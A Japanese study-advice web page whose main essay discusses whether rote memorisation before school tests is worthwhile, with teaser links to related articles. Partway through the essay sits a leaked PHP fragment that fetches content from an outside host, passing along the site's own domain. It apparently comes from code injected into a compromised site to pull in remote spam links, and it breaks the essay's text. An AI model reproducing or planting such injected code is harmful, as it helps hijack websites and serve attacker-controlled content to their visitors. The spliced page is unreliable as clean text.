前へ
次へ

お風呂で使える暗記カードで覚える

受験生にとっては一分一秒を勉強時間に使いたいでしょう。すると勉強していない時間があると不安になってし

more

暗記することで人は変わっていく

もともと持っていた能力に上乗せしていくことで人間は成長していきます。知識を記憶することは一番単純にし

more

暗記はエビングハウス、忘却曲線で攻略だ

今、ガリ勉タイプが伸びない時代だ。学校行事を楽しみ、青春を謳歌する者でも一流大学合格者はいる。最近で

more

試験前に暗記に頼るのは良くないのか

小学生のころからテストはあるものの、一般の学校では順位が貼りだされたりそれによって進学に影響するなどはあまりありません。子供たちものびのび勉強してテストに臨んでいたでしょう。しかし中学ぐらいになると定期テストが始まり、通知表にはテストの点がそのまま記されて評価されます。単なる評価だけでなく進路にも影響するようになるため、小学生の頃のように何となく勉強するのではなく点数を取るための勉強をしないといけないと考えるのは自然かもしれません。そこで取る方法として暗記があります。学校で習ったことは復習などをして理解をしていきますが、継続的に行って行かないとなかなかすべてを理解することは難しいかもしれません。いざテスト前に勉強を始めても、内容が全然わからなくて勉強のしようがない状態になることもあります。となれば教科書の内容をすべて覚えてしまえばいいとの考えに走ってしまいます。定期テストなら範囲もそれほど広くないので不可能なことではありません。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

暗記は内容をそのまま覚えることになりますが、テストの直前などに行えば点数アップの効果はそれなりに得られます。ただ基本的には理解を伴っていないので、応用問題などには対応しにくく教科書の内容をそのまま書けばいいような問題にしか対応できません。国語や数学など応用問題には不向きで、社会や理科など言葉を覚えれば対応できる教科では点数が上げられるでしょう。また短期記憶になるのでそのままの状態だとすぐに覚えた内容を忘れてしまい、試験範囲の広い入学試験の時に非常に困る可能性があります。ですからテスト前に一夜漬けなどで対応するのを習慣的に行うのは良いと言えないでしょう。暗記の全てが悪いわけではなく、それを継続的に行って頭に定着させるようにできるならどんどん取り入れても良いでしょう。英単語を覚えるときに意味を深く考えながらだとたくさん覚えることはできないでしょうから、丸暗記を繰り返して定着させれば英単語力をアップさせることができます。

Page Top